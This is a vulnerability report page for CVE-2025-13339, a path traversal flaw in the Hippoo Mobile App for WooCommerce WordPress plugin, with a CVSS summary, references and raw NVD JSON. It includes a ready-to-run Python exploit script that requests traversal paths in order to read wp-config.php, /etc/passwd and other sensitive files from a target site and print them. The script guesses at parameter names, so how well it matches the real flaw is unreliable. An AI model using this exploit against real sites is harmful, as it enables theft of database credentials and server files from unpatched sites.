Security Vulnerability Report
CVE-2025-13339 CVSS 7.5 HIGH

CVE-2025-13339

Published: 2025-12-10 05:16:02
Last Modified: 2026-04-15 00:35:42

Description

The Hippoo Mobile App for WooCommerce plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.7.1 via the template_redirect() function. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

Hippoo Mobile App for WooCommerce <= 1.7.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-13339 PoC - Path Traversal in Hippoo plugin
# Target: WordPress site with Hippoo Mobile App for WooCommerce <= 1.7.1
import requests


def exploit_path_traversal(target_url, file_path='../../../../wp-config.php'):
    """
    Exploit path traversal vulnerability to read arbitrary files

    Args:
        target_url: Base URL of the WordPress site
        file_path: Path to traverse (relative path to target file)

    Returns:
        Content of the requested file
    """
    # Try different parameter names commonly used in path traversal
    params_list = [
        {'template': file_path},
        {'file': file_path},
        {'page': file_path},
        {'hippoo_file': file_path},
    ]

    for params in params_list:
        try:
            response = requests.get(
                target_url,
                params=params,
                timeout=10,
                verify=False
            )
            # Check if we got valid content (not error page)
            if response.status_code == 200 and '<?php' in response.text:
                print(f'[+] Success with params: {params}')
                return response.text
            elif response.status_code == 200:
                print(f'[*] Got response with params: {params}')
                print(f'[*] Content length: {len(response.text)}')
        except requests.RequestException as e:
            print(f'[-] Error with params {params}: {e}')

    return None


def main():
    target = input('Enter target URL (e.g., http://target.com): ').strip()

    # Read wp-config.php
    print('[*] Attempting to read wp-config.php...')
    content = exploit_path_traversal(target, '../../../../wp-config.php')

    if content:
        print('\n[+] wp-config.php content:')
        print(content[:2000])  # Print first 2000 chars

        # Try to read other sensitive files
        files = [
            '../../../../etc/passwd',
            '../../../../.htaccess',
            '../../../wp-content/debug.log'
        ]
        for f in files:
            print(f'\n[*] Attempting to read: {f}')
            result = exploit_path_traversal(target, f)
            if result and ('<?php' in result or 'root:' in result):
                print(f'[+] Content preview: {result[:500]}')
    else:
        print('[-] Exploitation failed. Target may not be vulnerable.')


if __name__ == '__main__':
    main()
```

References

https://plugins.trac.wordpress.org/changeset/3412701/
https://www.wordfence.com/threat-intel/vulnerabilities/id/06900b4b-6607-4b25-b4bc-2e2906160421?source=cve

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-13339",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-10T05:16:02.200",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Hippoo Mobile App for WooCommerce plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.7.1 via the template_redirect() function. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-22"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/changeset/3412701/",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/06900b4b-6607-4b25-b4bc-2e2906160421?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```